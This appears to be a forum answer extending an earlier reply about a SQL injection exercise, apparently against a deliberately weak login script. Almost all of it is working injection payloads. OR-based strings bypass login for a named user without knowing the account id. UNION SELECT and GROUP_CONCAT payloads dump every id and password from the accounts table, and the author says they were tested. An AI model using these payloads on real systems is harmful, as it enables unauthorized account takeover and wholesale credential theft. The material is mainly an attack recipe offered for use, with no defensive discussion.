The accepted answer covers things.
However I notice that in the original question one point was to 'let us log into an account without knowing it's ID ahead of time'.
Assuming you know the name in advance (but not the id) then you could set id to something like the following
0 OR (first='joe' AND last='bloggs') --
I would also be inclined to set password to something like:-
' OR (first='joe' AND last='bloggs') --
This way the queries that check password before userid (eg, the balance check) could be made to work as well
For your amusement something else that might be fun to try. Set id to something like this:-
0 UNION SELECT -1, password, password, password, password, password, password, password, password FROM accounts WHERE (first='joe' AND last='bloggs') --
and password to something like this:-
' UNION SELECT -1, password, password, password, password, password, password, password, password FROM accounts WHERE (first='joe' AND last='bloggs') --
This should then put out the actual password in the account_info function (you might need to add ",password" a few more times, just so the column count matches the number of columns in the accounts table).
Or if you want all the ids:-
0 UNION SELECT -1, GROUP_CONCAT(CONCAT_ws(':', id, password)), GROUP_CONCAT(CONCAT_ws(':', id, password)), GROUP_CONCAT(CONCAT_ws(':', id, password)), GROUP_CONCAT(CONCAT_ws(':', id, password)), GROUP_CONCAT(CONCAT_ws(':', id, password)), GROUP_CONCAT(CONCAT_ws(':', id, password)), GROUP_CONCAT(CONCAT_ws(':', id, password)), GROUP_CONCAT(CONCAT_ws(':', id, password)) FROM accounts --
and passwords:-
' UNION SELECT -1, GROUP_CONCAT(CONCAT_ws(':', id, password)), GROUP_CONCAT(CONCAT_ws(':', id, password)), GROUP_CONCAT(CONCAT_ws(':', id, password)), GROUP_CONCAT(CONCAT_ws(':', id, password)), GROUP_CONCAT(CONCAT_ws(':', id, password)), GROUP_CONCAT(CONCAT_ws(':', id, password)), GROUP_CONCAT(CONCAT_ws(':', id, password)), GROUP_CONCAT(CONCAT_ws(':', id, password)) FROM accounts --
Something like this should give you all the ids and passwords in the system (subject to the max length limit on GROUP_CONCAT). So you could then log on with whichever id and password you wanted to easily afterwards.
I copied your script and knocked up a test table and the above worked.